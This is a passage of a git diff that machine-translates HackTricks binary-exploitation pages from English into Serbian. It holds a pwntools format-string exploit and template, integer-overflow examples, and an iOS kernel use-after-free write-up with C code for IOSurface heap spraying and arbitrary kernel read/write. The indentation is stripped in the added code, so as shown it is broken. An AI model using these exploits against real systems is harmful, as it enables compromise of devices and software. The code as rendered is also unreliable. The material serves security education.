-Now it's time to find how to control 1 address in the stack to access it from the second format string vulnerability: - +Sada je vreme da pronađemo kako da kontrolišemo 1 adresu u steku da bismo joj pristupili iz druge ranjivosti format string-a: ```python from pwn import * def leak_heap(p): - p.sendlineafter(b"first password:", b"%5$p") - p.recvline() - response = p.recvline().strip()[2:] #Remove new line and "0x" prefix - return int(response, 16) +p.sendlineafter(b"first password:", b"%5$p") +p.recvline() +response = p.recvline().strip()[2:] #Remove new line and "0x" prefix +return int(response, 16) for i in range(30): - p = process("./fs-read") +p = process("./fs-read") - heap_leak_addr = leak_heap(p) - print(f"Leaked heap: {hex(heap_leak_addr)}") +heap_leak_addr = leak_heap(p) +print(f"Leaked heap: {hex(heap_leak_addr)}") - password_addr = heap_leak_addr - 0x126a +password_addr = heap_leak_addr - 0x126a - print(f"Try: {i}") - payload = f"%{i}$p|||".encode() - payload += b"AAAAAAAA" +print(f"Try: {i}") +payload = f"%{i}$p|||".encode() +payload += b"AAAAAAAA" - p.sendline(payload) - output = p.clean() - print(output.decode("utf-8")) - p.close() +p.sendline(payload) +output = p.clean() +print(output.decode("utf-8")) +p.close() ``` - -And it's possible to see that in the **try 14** with the used passing we can control an address: +I moguće je videti da u **try 14** sa korišćenim prosleđivanjem možemo kontrolisati adresu:
### Exploit - ```python from pwn import * p = process("./fs-read") def leak_heap(p): - # At offset 25 there is a heap leak - p.sendlineafter(b"first password:", b"%25$p") - p.recvline() - response = p.recvline().strip()[2:] #Remove new line and "0x" prefix - return int(response, 16) +# At offset 25 there is a heap leak +p.sendlineafter(b"first password:", b"%25$p") +p.recvline() +response = p.recvline().strip()[2:] #Remove new line and "0x" prefix +return int(response, 16) heap_leak_addr = leak_heap(p) print(f"Leaked heap: {hex(heap_leak_addr)}") @@ -178,7 +163,6 @@ output = p.clean() print(output) p.close() ``` -
{{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/format-strings/format-strings-template.md b/src/binary-exploitation/format-strings/format-strings-template.md index 71e1d4624..8e2397114 100644 --- a/src/binary-exploitation/format-strings/format-strings-template.md +++ b/src/binary-exploitation/format-strings/format-strings-template.md @@ -1,7 +1,6 @@ -# Format Strings Template +# Шаблон формата стринга {{#include ../../banners/hacktricks-training.md}} - ```python from pwn import * from time import sleep @@ -36,23 +35,23 @@ print(" ====================== ") def connect_binary(): - global P, ELF_LOADED, ROP_LOADED +global P, ELF_LOADED, ROP_LOADED - if LOCAL: - P = process(LOCAL_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +if LOCAL: +P = process(LOCAL_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTETTCP: - P = remote('10.10.10.10',1338) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +elif REMOTETTCP: +P = remote('10.10.10.10',1338) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - P = ssh_shell.process(REMOTE_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(elf)# Find ROP gadgets +elif REMOTESSH: +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +P = ssh_shell.process(REMOTE_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(elf)# Find ROP gadgets ####################################### @@ -60,39 +59,39 @@ def connect_binary(): ####################################### def send_payload(payload): - payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD - log.info("payload = %s" % repr(payload)) - if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") - P.sendline(payload) - sleep(0.5) - return P.recv() +payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD +log.info("payload = %s" % repr(payload)) +if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") +P.sendline(payload) +sleep(0.5) +return P.recv() def get_formatstring_config(): - global P +global P - for offset in range(1,1000): - connect_binary() - P.clean() +for offset in range(1,1000): +connect_binary() +P.clean() - payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() +payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() - if b"41" in recieved: - for padlen in range(0,4): - if b"41414141" in recieved: - connect_binary() - payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() - print(recieved) - if b"42424242" in recieved: - log.info(f"Found offset ({offset}) and padlen ({padlen})") - return offset, padlen +if b"41" in recieved: +for padlen in range(0,4): +if b"41414141" in recieved: +connect_binary() +payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() +print(recieved) +if b"42424242" in recieved: +log.info(f"Found offset ({offset}) and padlen ({padlen})") +return offset, padlen - else: - connect_binary() - payload = b" " + payload - recieved = send_payload(payload).strip() +else: +connect_binary() +payload = b" " + payload +recieved = send_payload(payload).strip() # In order to exploit a format string you need to find a position where part of your payload @@ -125,10 +124,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}") connect_binary() if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" - sleep(5) +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" +sleep(5) format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) @@ -141,5 +140,4 @@ format_string.execute_writes() P.interactive() ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/integer-overflow.md b/src/binary-exploitation/integer-overflow.md index cf1a6ca4f..5c5bd42b5 100644 --- a/src/binary-exploitation/integer-overflow.md +++ b/src/binary-exploitation/integer-overflow.md @@ -2,122 +2,114 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -At the heart of an **integer overflow** is the limitation imposed by the **size** of data types in computer programming and the **interpretation** of the data. +U srži **integer overflow** je ograničenje koje nameće **veličina** tipova podataka u programiranju i **tumačenje** podataka. -For example, an **8-bit unsigned integer** can represent values from **0 to 255**. If you attempt to store the value 256 in an 8-bit unsigned integer, it wraps around to 0 due to the limitation of its storage capacity. Similarly, for a **16-bit unsigned integer**, which can hold values from **0 to 65,535**, adding 1 to 65,535 will wrap the value back to 0. +Na primer, **8-bitni bez znak** može predstavljati vrednosti od **0 do 255**. Ako pokušate da sačuvate vrednost 256 u 8-bitnom bez znaka, ona se vraća na 0 zbog ograničenja svoje kapaciteta skladištenja. Slično tome, za **16-bitni bez znak**, koji može da drži vrednosti od **0 do 65,535**, dodavanje 1 na 65,535 će vratiti vrednost nazad na 0. -Moreover, an **8-bit signed integer** can represent values from **-128 to 127**. This is because one bit is used to represent the sign (positive or negative), leaving 7 bits to represent the magnitude. The most negative number is represented as **-128** (binary `10000000`), and the most positive number is **127** (binary `01111111`). +Štaviše, **8-bitni sa znakom** može predstavljati vrednosti od **-128 do 127**. To je zato što se jedan bit koristi za predstavljanje znaka (pozitivan ili negativan), ostavljajući 7 bita za predstavljanje magnitude. Najnegativniji broj se predstavlja kao **-128** (binarno `10000000`), a najpozitivniji broj je **127** (binarno `01111111`). -### Max values +### Maksimalne vrednosti -For potential **web vulnerabilities** it's very interesting to know the maximum supported values: +Za potencijalne **web ranjivosti** veoma je zanimljivo znati maksimalne podržane vrednosti: {{#tabs}} {{#tab name="Rust"}} - ```rust fn main() { - let mut quantity = 2147483647; +let mut quantity = 2147483647; - let (mul_result, _) = i32::overflowing_mul(32767, quantity); - let (add_result, _) = i32::overflowing_add(1, quantity); +let (mul_result, _) = i32::overflowing_mul(32767, quantity); +let (add_result, _) = i32::overflowing_add(1, quantity); - println!("{}", mul_result); - println!("{}", add_result); +println!("{}", mul_result); +println!("{}", add_result); } ``` - {{#endtab}} {{#tab name="C"}} - ```c #include #include int main() { - int a = INT_MAX; - int b = 0; - int c = 0; +int a = INT_MAX; +int b = 0; +int c = 0; - b = a * 100; - c = a + 1; +b = a * 100; +c = a + 1; - printf("%d\n", INT_MAX); - printf("%d\n", b); - printf("%d\n", c); - return 0; +printf("%d\n", INT_MAX); +printf("%d\n", b); +printf("%d\n", c); +return 0; } ``` - {{#endtab}} {{#endtabs}} -## Examples +## Primeri -### Pure overflow - -The printed result will be 0 as we overflowed the char: +### Čista preliv +Ispisani rezultat će biti 0 jer smo preli u char: ```c #include int main() { - unsigned char max = 255; // 8-bit unsigned integer - unsigned char result = max + 1; - printf("Result: %d\n", result); // Expected to overflow - return 0; +unsigned char max = 255; // 8-bit unsigned integer +unsigned char result = max + 1; +printf("Result: %d\n", result); // Expected to overflow +return 0; } ``` +### Konverzija sa potpisanog na nepotpisani -### Signed to Unsigned Conversion - -Consider a situation where a signed integer is read from user input and then used in a context that treats it as an unsigned integer, without proper validation: - +Razmotrite situaciju u kojoj se potpisani ceo broj čita iz korisničkog unosa i zatim se koristi u kontekstu koji ga tretira kao nepotpisani ceo broj, bez pravilne validacije: ```c #include int main() { - int userInput; // Signed integer - printf("Enter a number: "); - scanf("%d", &userInput); +int userInput; // Signed integer +printf("Enter a number: "); +scanf("%d", &userInput); - // Treating the signed input as unsigned without validation - unsigned int processedInput = (unsigned int)userInput; +// Treating the signed input as unsigned without validation +unsigned int processedInput = (unsigned int)userInput; - // A condition that might not work as intended if userInput is negative - if (processedInput > 1000) { - printf("Processed Input is large: %u\n", processedInput); - } else { - printf("Processed Input is within range: %u\n", processedInput); - } +// A condition that might not work as intended if userInput is negative +if (processedInput > 1000) { +printf("Processed Input is large: %u\n", processedInput); +} else { +printf("Processed Input is within range: %u\n", processedInput); +} - return 0; +return 0; } ``` +U ovom primeru, ako korisnik unese negativan broj, biće interpretiran kao veliki nesigned integer zbog načina na koji se binarne vrednosti interpretiraju, što može dovesti do neočekivanog ponašanja. -In this example, if a user inputs a negative number, it will be interpreted as a large unsigned integer due to the way binary values are interpreted, potentially leading to unexpected behavior. - -### Other Examples +### Ostali primeri - [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html) - - Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection +- Samo 1B se koristi za čuvanje veličine lozinke, tako da je moguće prepuniti je i naterati je da misli da je dužina 4, dok je zapravo 260, kako bi se zaobišla zaštita provere dužine. - [https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html) - - Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one: +- Dati nekoliko brojeva, otkrijte koristeći z3 novi broj koji pomnožen sa prvim će dati drugi: - ``` - (((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569) - ``` +``` +(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569) +``` - [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/) - - Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection and overwrite in the stack the next local variable and bypass both protections +- Samo 1B se koristi za čuvanje veličine lozinke, tako da je moguće prepuniti je i naterati je da misli da je dužina 4, dok je zapravo 260, kako bi se zaobišla zaštita provere dužine i prepisala sledeća lokalna promenljiva na steku i zaobišla obe zaštite. ## ARM64 -This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/). +Ovo **se ne menja u ARM64** kao što možete videti u [**ovom blog postu**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/). {{#include ../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/ios-exploiting.md b/src/binary-exploitation/ios-exploiting.md index dbf5dc009..e52942665 100644 --- a/src/binary-exploitation/ios-exploiting.md +++ b/src/binary-exploitation/ios-exploiting.md @@ -1,212 +1,203 @@ # iOS Exploiting -## Physical use-after-free +## Fizičko korišćenje nakon oslobađanja -This is a summary from the post from [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html) moreover further information about exploit using this technique can be found in [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd) +Ovo je sažetak iz posta sa [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html), a dodatne informacije o eksploatu korišćenjem ove tehnike mogu se naći na [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd) -### Memory management in XNU +### Upravljanje memorijom u XNU -The **virtual memory address space** for user processes on iOS spans from **0x0 to 0x8000000000**. However, these addresses don’t directly map to physical memory. Instead, the **kernel** uses **page tables** to translate virtual addresses into actual **physical addresses**. +**Virtuelni adresni prostor** za korisničke procese na iOS-u se proteže od **0x0 do 0x8000000000**. Međutim, ove adrese se ne mapiraju direktno na fizičku memoriju. Umesto toga, **kernel** koristi **tabele stranica** za prevođenje virtuelnih adresa u stvarne **fizičke adrese**. -#### Levels of Page Tables in iOS +#### Nivoi tabela stranica u iOS-u -Page tables are organized hierarchically in three levels: +Tabele stranica su organizovane hijerarhijski u tri nivoa: -1. **L1 Page Table (Level 1)**: - * Each entry here represents a large range of virtual memory. - * It covers **0x1000000000 bytes** (or **256 GB**) of virtual memory. -2. **L2 Page Table (Level 2)**: - * An entry here represents a smaller region of virtual memory, specifically **0x2000000 bytes** (32 MB). - * An L1 entry may point to an L2 table if it can't map the entire region itself. -3. **L3 Page Table (Level 3)**: - * This is the finest level, where each entry maps a single **4 KB** memory page. - * An L2 entry may point to an L3 table if more granular control is needed. +1. **L1 tabela stranica (Nivo 1)**: +* Svaki unos ovde predstavlja veliki opseg virtuelne memorije. +* Pokriva **0x1000000000 bajtova** (ili **256 GB**) virtuelne memorije. +2. **L2 tabela stranica (Nivo 2)**: +* Unos ovde predstavlja manju oblast virtuelne memorije, specifično **0x2000000 bajtova** (32 MB). +* L1 unos može ukazivati na L2 tabelu ako ne može da mapira celu oblast sam. +3. **L3 tabela stranica (Nivo 3)**: +* Ovo je najfiniji nivo, gde svaki unos mapira jednu **4 KB** stranicu memorije. +* L2 unos može ukazivati na L3 tabelu ako je potrebna preciznija kontrola. -#### Mapping Virtual to Physical Memory +#### Mapiranje virtuelne u fizičku memoriju -* **Direct Mapping (Block Mapping)**: - * Some entries in a page table directly **map a range of virtual addresses** to a contiguous range of physical addresses (like a shortcut). -* **Pointer to Child Page Table**: - * If finer control is needed, an entry in one level (e.g., L1) can point to a **child page table** at the next level (e.g., L2). +* **Direktno mapiranje (Blok mapiranje)**: +* Neki unosi u tabeli stranica direktno **mapiraju opseg virtuelnih adresa** na kontiguitet fizičkih adresa (poput prečice). +* **Pokazivač na tabelu stranica deteta**: +* Ako je potrebna finija kontrola, unos u jednom nivou (npr. L1) može ukazivati na **tabelu stranica deteta** na sledećem nivou (npr. L2). -#### Example: Mapping a Virtual Address +#### Primer: Mapiranje virtuelne adrese -Let’s say you try to access the virtual address **0x1000000000**: +Recimo da pokušavate da pristupite virtuelnoj adresi **0x1000000000**: -1. **L1 Table**: - * The kernel checks the L1 page table entry corresponding to this virtual address. If it has a **pointer to an L2 page table**, it goes to that L2 table. -2. **L2 Table**: - * The kernel checks the L2 page table for a more detailed mapping. If this entry points to an **L3 page table**, it proceeds there. -3. **L3 Table**: - * The kernel looks up the final L3 entry, which points to the **physical address** of the actual memory page. +1. **L1 tabela**: +* Kernel proverava L1 unos tabele stranica koji odgovara ovoj virtuelnoj adresi. Ako ima **pokazivač na L2 tabelu stranica**, prelazi na tu L2 tabelu. +2. **L2 tabela**: +* Kernel proverava L2 tabelu stranica za detaljnije mapiranje. Ako ovaj unos ukazuje na **L3 tabelu stranica**, nastavlja dalje. +3. **L3 tabela**: +* Kernel traži konačni L3 unos, koji ukazuje na **fizičku adresu** stvarne stranice memorije. -#### Example of Address Mapping +#### Primer mapiranja adrese -If you write the physical address **0x800004000** into the first index of the L2 table, then: +Ako upišete fizičku adresu **0x800004000** u prvi indeks L2 tabele, tada: -* Virtual addresses from **0x1000000000** to **0x1002000000** map to physical addresses from **0x800004000** to **0x802004000**. -* This is a **block mapping** at the L2 level. +* Virtuelne adrese od **0x1000000000** do **0x1002000000** mapiraju se na fizičke adrese od **0x800004000** do **0x802004000**. +* Ovo je **blok mapiranje** na L2 nivou. -Alternatively, if the L2 entry points to an L3 table: +Alternativno, ako L2 unos ukazuje na L3 tabelu: -* Each 4 KB page in the virtual address range **0x1000000000 -> 0x1002000000** would be mapped by individual entries in the L3 table. +* Svaka 4 KB stranica u opsegu virtuelnih adresa **0x1000000000 -> 0x1002000000** biće mapirana pojedinačnim unosima u L3 tabeli. -### Physical use-after-free +### Fizičko korišćenje nakon oslobađanja -A **physical use-after-free** (UAF) occurs when: +**Fizičko korišćenje nakon oslobađanja** (UAF) se dešava kada: -1. A process **allocates** some memory as **readable and writable**. -2. The **page tables** are updated to map this memory to a specific physical address that the process can access. -3. The process **deallocates** (frees) the memory. -4. However, due to a **bug**, the kernel **forgets to remove the mapping** from the page tables, even though it marks the corresponding physical memory as free. -5. The kernel can then **reallocate this "freed" physical memory** for other purposes, like **kernel data**. -6. Since the mapping wasn’t removed, the process can still **read and write** to this physical memory. +1. Proces **alokira** neku memoriju kao **čitljivu i zapisivu**. +2. **Tabele stranica** se ažuriraju da mapiraju ovu memoriju na specifičnu fizičku adresu kojoj proces može pristupiti. +3. Proces **dealokira** (oslobađa) memoriju. +4. Međutim, zbog **greške**, kernel **zaboravlja da ukloni mapiranje** iz tabela stranica, iako označava odgovarajuću fizičku memoriju kao slobodnu. +5. Kernel može zatim **ponovo alocirati ovu "oslobođenu" fizičku memoriju** za druge svrhe, poput **kernel podataka**. +6. Pošto mapiranje nije uklonjeno, proces može i dalje **čitati i pisati** u ovu fizičku memoriju. -This means the process can access **pages of kernel memory**, which could contain sensitive data or structures, potentially allowing an attacker to **manipulate kernel memory**. +To znači da proces može pristupiti **stranicama kernel memorije**, koje mogu sadržati osetljive podatke ili strukture, potencijalno omogućavajući napadaču da **manipuliše kernel memorijom**. -### Exploitation Strategy: Heap Spray +### Strategija eksploatacije: Heap Spray -Since the attacker can’t control which specific kernel pages will be allocated to freed memory, they use a technique called **heap spray**: +Pošto napadač ne može kontrolisati koje specifične kernel stranice će biti alocirane na oslobođenoj memoriji, koriste tehniku nazvanu **heap spray**: -1. The attacker **creates a large number of IOSurface objects** in kernel memory. -2. Each IOSurface object contains a **magic value** in one of its fields, making it easy to identify. -3. They **scan the freed pages** to see if any of these IOSurface objects landed on a freed page. -4. When they find an IOSurface object on a freed page, they can use it to **read and write kernel memory**. +1. Napadač **stvara veliki broj IOSurface objekata** u kernel memoriji. +2. Svaki IOSurface objekat sadrži **magičnu vrednost** u jednom od svojih polja, što olakšava identifikaciju. +3. Oni **skeniraju oslobođene stranice** da vide da li je neki od ovih IOSurface objekata sleteo na oslobođenu stranicu. +4. Kada pronađu IOSurface objekat na oslobođenoj stranici, mogu ga koristiti za **čitati i pisati kernel memoriju**. -More info about this in [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups) +Više informacija o ovome u [https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups) -### Step-by-Step Heap Spray Process +### Korak-po-korak proces heap spray-a -1. **Spray IOSurface Objects**: The attacker creates many IOSurface objects with a special identifier ("magic value"). -2. **Scan Freed Pages**: They check if any of the objects have been allocated on a freed page. -3. **Read/Write Kernel Memory**: By manipulating fields in the IOSurface object, they gain the ability to perform **arbitrary reads and writes** in kernel memory. This lets them: - * Use one field to **read any 32-bit value** in kernel memory. - * Use another field to **write 64-bit values**, achieving a stable **kernel read/write primitive**. - -Generate IOSurface objects with the magic value IOSURFACE\_MAGIC to later search for: +1. **Spray IOSurface objekata**: Napadač stvara mnogo IOSurface objekata sa posebnim identifikatorom ("magična vrednost"). +2. **Skeniranje oslobođenih stranica**: Proveravaju da li su neki od objekata alocirani na oslobođenoj stranici. +3. **Čitanje/Pisanje kernel memorije**: Manipulacijom polja u IOSurface objektu, stiču sposobnost da izvrše **arbitrarna čitanja i pisanja** u kernel memoriji. Ovo im omogućava: +* Da koriste jedno polje za **čitati bilo koju 32-bitnu vrednost** u kernel memoriji. +* Da koriste drugo polje za **pisanje 64-bitnih vrednosti**, postizajući stabilnu **kernel read/write primitivu**. +Generišite IOSurface objekte sa magičnom vrednošću IOSURFACE_MAGIC za kasnije pretraživanje: ```c void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) { - if (*nClients >= 0x4000) return; - for (int i = 0; i < nSurfaces; i++) { - fast_create_args_t args; - lock_result_t result; - - size_t size = IOSurfaceLockResultSize; - args.address = 0; - args.alloc_size = *nClients + 1; - args.pixel_format = IOSURFACE_MAGIC; - - IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size); - io_connect_t id = result.surface_id; - - (*clients)[*nClients] = id; - *nClients = (*nClients) += 1; - } +if (*nClients >= 0x4000) return; +for (int i = 0; i < nSurfaces; i++) { +fast_create_args_t args; +lock_result_t result; + +size_t size = IOSurfaceLockResultSize; +args.address = 0; +args.alloc_size = *nClients + 1; +args.pixel_format = IOSURFACE_MAGIC; + +IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size); +io_connect_t id = result.surface_id; + +(*clients)[*nClients] = id; +*nClients = (*nClients) += 1; +} } ``` - -Search for **`IOSurface`** objects in one freed physical page: - +Pretražite **`IOSurface`** objekte u jednoj oslobođenoj fizičkoj stranici: ```c int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) { - io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000); - int nSurfaceIDs = 0; - - for (int i = 0; i < 0x400; i++) { - spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs); - - for (int j = 0; j < nPages; j++) { - uint64_t start = puafPages[j]; - uint64_t stop = start + (pages(1) / 16); - - for (uint64_t k = start; k < stop; k += 8) { - if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) { - info.object = k; - info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1]; - if (self_task) *self_task = iosurface_get_receiver(k); - goto sprayDone; - } - } - } - } - +io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000); +int nSurfaceIDs = 0; + +for (int i = 0; i < 0x400; i++) { +spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs); + +for (int j = 0; j < nPages; j++) { +uint64_t start = puafPages[j]; +uint64_t stop = start + (pages(1) / 16); + +for (uint64_t k = start; k < stop; k += 8) { +if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) { +info.object = k; +info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1]; +if (self_task) *self_task = iosurface_get_receiver(k); +goto sprayDone; +} +} +} +} + sprayDone: - for (int i = 0; i < nSurfaceIDs; i++) { - if (surfaceIDs[i] == info.surface) continue; - iosurface_release(client, surfaceIDs[i]); - } - free(surfaceIDs); - - return 0; +for (int i = 0; i < nSurfaceIDs; i++) { +if (surfaceIDs[i] == info.surface) continue; +iosurface_release(client, surfaceIDs[i]); +} +free(surfaceIDs); + +return 0; } ``` +### Postizanje Kernel Read/Write sa IOSurface -### Achieving Kernel Read/Write with IOSurface +Nakon što postignemo kontrolu nad IOSurface objektom u kernel memoriji (mapiranim na oslobođenu fizičku stranicu dostupnu iz korisničkog prostora), možemo ga koristiti za **arbitrarne kernel read i write operacije**. -After achieving control over an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), we can use it for **arbitrary kernel read and write operations**. +**Ključna Polja u IOSurface** -**Key Fields in IOSurface** +IOSurface objekat ima dva ključna polja: -The IOSurface object has two crucial fields: +1. **Pokazivač na Broj Korišćenja**: Omogućava **32-bitno čitanje**. +2. **Pokazivač na Indeksirani Vreme**: Omogućava **64-bitno pisanje**. -1. **Use Count Pointer**: Allows a **32-bit read**. -2. **Indexed Timestamp Pointer**: Allows a **64-bit write**. +Prepisivanjem ovih pokazivača, preusmeravamo ih na arbitrarne adrese u kernel memoriji, omogućavajući read/write mogućnosti. -By overwriting these pointers, we redirect them to arbitrary addresses in kernel memory, enabling read/write capabilities. +#### 32-Bitno Kernel Čitanje -#### 32-Bit Kernel Read - -To perform a read: - -1. Overwrite the **use count pointer** to point to the target address minus a 0x14-byte offset. -2. Use the `get_use_count` method to read the value at that address. +Da bismo izvršili čitanje: +1. Prepišite **pokazivač na broj korišćenja** da pokazuje na ciljnu adresu minus 0x14-bajtni ofset. +2. Koristite `get_use_count` metodu da pročitate vrednost na toj adresi. ```c uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) { - uint64_t args[1] = {surfaceID}; - uint32_t size = 1; - uint64_t out = 0; - IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0); - return (uint32_t)out; +uint64_t args[1] = {surfaceID}; +uint32_t size = 1; +uint64_t out = 0; +IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0); +return (uint32_t)out; } uint32_t iosurface_kread32(uint64_t addr) { - uint64_t orig = iosurface_get_use_count_pointer(info.object); - iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14 - uint32_t value = get_use_count(info.client, info.surface); - iosurface_set_use_count_pointer(info.object, orig); - return value; +uint64_t orig = iosurface_get_use_count_pointer(info.object); +iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14 +uint32_t value = get_use_count(info.client, info.surface); +iosurface_set_use_count_pointer(info.object, orig); +return value; } ``` - #### 64-Bit Kernel Write -To perform a write: - -1. Overwrite the **indexed timestamp pointer** to the target address. -2. Use the `set_indexed_timestamp` method to write a 64-bit value. +Da biste izvršili pisanje: +1. Prepišite **pokazivač indeksiranog vremenskog pečata** na cilnu adresu. +2. Koristite metodu `set_indexed_timestamp` da biste napisali 64-bitnu vrednost. ```c void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) { - uint64_t args[3] = {surfaceID, 0, value}; - IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0); +uint64_t args[3] = {surfaceID, 0, value}; +IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0); } void iosurface_kwrite64(uint64_t addr, uint64_t value) { - uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object); - iosurface_set_indexed_timestamp_pointer(info.object, addr); - set_indexed_timestamp(info.client, info.surface, value); - iosurface_set_indexed_timestamp_pointer(info.object, orig); +uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object); +iosurface_set_indexed_timestamp_pointer(info.object, addr); +set_indexed_timestamp(info.client, info.surface, value); +iosurface_set_indexed_timestamp_pointer(info.object, orig); } ``` +#### Pregled Eksploatacije -#### Exploit Flow Recap - -1. **Trigger Physical Use-After-Free**: Free pages are available for reuse. -2. **Spray IOSurface Objects**: Allocate many IOSurface objects with a unique "magic value" in kernel memory. -3. **Identify Accessible IOSurface**: Locate an IOSurface on a freed page you control. -4. **Abuse Use-After-Free**: Modify pointers in the IOSurface object to enable arbitrary **kernel read/write** via IOSurface methods. - -With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices). +1. **Pokreni Fizičku Upotrebu-Nakon-Oslobađanja**: Oslobođene stranice su dostupne za ponovnu upotrebu. +2. **Sprej IOSurface Objekata**: Alociraj mnogo IOSurface objekata sa jedinstvenom "čarobnom vrednošću" u kernel memoriji. +3. **Identifikuj Pristupačni IOSurface**: Pronađi IOSurface na oslobođenoj stranici koju kontrolišeš. +4. **Zloupotrebi Upotrebu-Nakon-Oslobađanja**: Izmeni pokazivače u IOSurface objektu da omogućiš proizvoljno **čitanje/pisanje u kernel** putem IOSurface metoda. +Sa ovim primitivima, eksploatacija omogućava kontrolisano **32-bitno čitanje** i **64-bitno pisanje** u kernel memoriju. Dalji koraci za jailbreak mogu uključivati stabilnije primitivne operacije čitanja/pisanja, što može zahtevati zaobilaženje dodatnih zaštita (npr., PPL na novijim arm64e uređajima). diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 319126fe0..327ebfa4d 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -1,197 +1,190 @@ # Libc Heap -## Heap Basics +## Heap Osnove -The heap is basically the place where a program is going to be able to store data when it requests data calling functions like **`malloc`**, `calloc`... Moreover, when this memory is no longer needed it's made available calling the function **`free`**. +Heap je u suštini mesto gde program može da skladišti podatke kada zahteva podatke 